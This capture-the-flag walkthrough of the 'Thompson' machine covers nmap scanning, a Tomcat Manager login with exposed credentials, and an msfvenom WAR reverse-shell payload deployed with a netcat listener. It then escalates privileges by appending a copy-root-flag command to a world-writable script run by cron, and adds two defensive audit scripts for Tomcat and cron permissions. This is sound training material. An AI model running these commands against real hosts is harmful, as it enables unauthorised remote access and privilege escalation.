Thompson

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.196.112

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specify ports 22, 8009 and 8080

  • (-oN nmap): Save the output to a file called nmap

nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112

Enumeration

Let's visit the site on port 8080.

It's an Apache Tomcat page. There is a Manager App tab; let's click it and see what it says.

We need a username and a password, which we do not have, so let's click Cancel. Once we do, we get this page.

This page gives us a username and a password, so let's use these credentials to log in.

We are logged in. Looking through the application manager, we see something interesting.

We can upload WAR files, so we can build a WAR payload that gives us a reverse shell on the machine.
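From the defender's side, two Tomcat settings made this path possible: an account holding a manager-* role with a guessable password, and a Manager App reachable from any address. The script below is an added example, not part of the original writeup, and does a read-only check of both. It assumes the stock layout of conf/tomcat-users.xml and webapps/manager/META-INF/context.xml, that <user> tags list username before roles (Tomcat's own ordering), and it builds its own constructed sample files so it runs offline.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit the two Tomcat settings
# behind the Manager App attack path. Assumes stock file layout and that
# <user> tags list username before roles.

# Drop XML comments (including multi-line ones) so that a commented-out
# setting is not mistaken for an active one.
strip_xml_comments() {
    awk '
    {
        line = $0; out = ""
        while (length(line) > 0) {
            if (incomment) {
                i = index(line, "-->")
                if (i == 0) { line = ""; break }
                line = substr(line, i + 3); incomment = 0
            } else {
                i = index(line, "<!--")
                if (i == 0) { out = out line; line = ""; break }
                out = out substr(line, 1, i - 1); line = substr(line, i + 4); incomment = 1
            }
        }
        if (out != "") print out
    }' "$1"
}

# Print one finding per line: every user holding a manager-* role, and
# NO-REMOTE-ADDR-VALVE when the manager context no longer restricts source
# addresses.
check_tomcat_manager() {
    users_xml=$1
    manager_ctx=$2
    strip_xml_comments "$users_xml" |
        sed -n 's/.*<user[^>]*username="\([^"]*\)"[^>]*roles="\([^"]*\)".*/\1 \2/p' |
        while read -r name roles; do
            case ",$roles," in
                *,manager-*) printf 'MANAGER-ROLE:%s:%s\n' "$name" "$roles" ;;
            esac
        done
    if ! strip_xml_comments "$manager_ctx" | grep -q 'RemoteAddrValve'; then
        printf 'NO-REMOTE-ADDR-VALVE\n'
    fi
}

# Constructed sample files (placeholder passwords, not values from the box):
# one live manager-gui user, one commented-out user that must be ignored, and
# a manager context whose RemoteAddrValve has been commented out.
demo_setup() {
    dir=$(mktemp -d)
    cat > "$dir/tomcat-users.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <!-- constructed sample; this commented-out entry must be ignored:
  <user username="old" password="CHANGEME" roles="manager-gui"/>
  -->
  <role rolename="manager-gui"/>
  <user username="deploy" password="CHANGEME" roles="manager-gui"/>
  <user username="viewer" password="CHANGEME" roles="tomcat"/>
</tomcat-users>
EOF
    cat > "$dir/context.xml" <<'EOF'
<Context antiResourceLocking="false" privileged="true">
  <!-- valve commented out, so the manager answers to any source address:
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1" />
  -->
</Context>
EOF
    echo "$dir"
}

# Stand-alone run against the constructed sample.
d=$(demo_setup)
check_tomcat_manager "$d/tomcat-users.xml" "$d/context.xml"
rm -rf "$d"
```

Run it against a real install as check_tomcat_manager /path/to/conf/tomcat-users.xml /path/to/webapps/manager/META-INF/context.xml. A clean result is no MANAGER-ROLE line at all (the Manager App is simply not deployed) or, where deployment is needed, a single dedicated account plus an active RemoteAddrValve limiting who can reach it.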

Exploitation

Let's first make the payload; make sure to replace my IP with yours:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war

Let's upload the file: click Browse and select the file.

Then hit Deploy; you should now see the file listed.

Now let's start a netcat listener.

Now click on the file and you should get a reverse shell.

Let's stabilize the shell with these commands:

python -c 'import pty; pty.spawn("/bin/bash")'   # spawn a proper pty
Ctrl + Z                                          # background the shell
stty raw -echo; fg                                # stop the local terminal echoing, then foreground it
reset                                             # reinitialise the terminal

We can read the user.txt file.

There are two other files in the directory; let's look at what they contain.

It looks like id.sh runs the id command and writes the output to a file called test.txt. Let's check the cron jobs running on this machine.

It looks like the cron job runs the script in /home/jack, so let's copy the root flag into this directory by adding a command to id.sh and then read it.

We can edit the file with nano, or use this command:

echo "cp /root/root.txt /home/jack/root.txt" >> id.sh

Once the cron job runs again, we should see root.txt in our directory and can read it.
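The root cause here is a privileged cron job executing a script that an unprivileged user can modify. The script below is an added example, not part of the original writeup: it parses a system-crontab-style file (minute, hour, day, month, weekday, user, command; @reboot-style entries included), takes the first word of each command as the script path, and reports any script, or its parent directory, that is writable by group or others. It assumes the system crontab layout and builds its own constructed sample crontab and scripts so that it runs offline.

```shell
#!/bin/sh
# Added example (not from the original writeup): find cron jobs whose script
# can be modified by someone other than its owner. Assumes system crontab
# layout (5 time fields, user, command).

# Return 0 when the path is writable by group or others. Uses the ls -ld mode
# string so it works with both GNU and BSD userland.
is_loosely_writable() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    [ -n "$mode" ] || return 1
    case "$mode" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# Print "user:script" for each cron entry whose script, or the directory it
# lives in, is writable by group or others. Comments, blank lines and
# VAR=value lines are skipped.
audit_crontab() {
    awk '
        $1 !~ /^#/ && $1 !~ /^@/ && NF >= 7 && $0 !~ /^[A-Za-z_][A-Za-z0-9_]*=/ { print $6, $7 }
        $1 ~ /^@/ && NF >= 3 { print $2, $3 }
    ' "$1" |
    while read -r user cmd; do
        if is_loosely_writable "$cmd" || is_loosely_writable "$(dirname "$cmd")"; then
            printf '%s:%s\n' "$user" "$cmd"
        fi
    done
}

# Constructed sample: one script writable by everyone (the id.sh pattern from
# the box) and one with sane permissions.
demo_setup() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\nid > /tmp/test.txt\n' > "$dir/id.sh"
    printf '#!/bin/sh\necho ok\n' > "$dir/safe.sh"
    chmod 0777 "$dir/id.sh"
    chmod 0755 "$dir/safe.sh"
    cat > "$dir/crontab" <<EOF
# constructed sample crontab, not taken from the target machine
SHELL=/bin/sh
* * * * * root $dir/id.sh
*/5 * * * * root $dir/safe.sh
@reboot root $dir/safe.sh
EOF
    echo "$dir"
}

# Stand-alone run against the constructed sample.
d=$(demo_setup)
audit_crontab "$d/crontab"
rm -rf "$d"
```

On a real host, run audit_crontab /etc/crontab and each file under /etc/cron.d; any line it prints is a script that should be owned by root with mode 0755 or tighter, or a job that should not be running as root at all.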
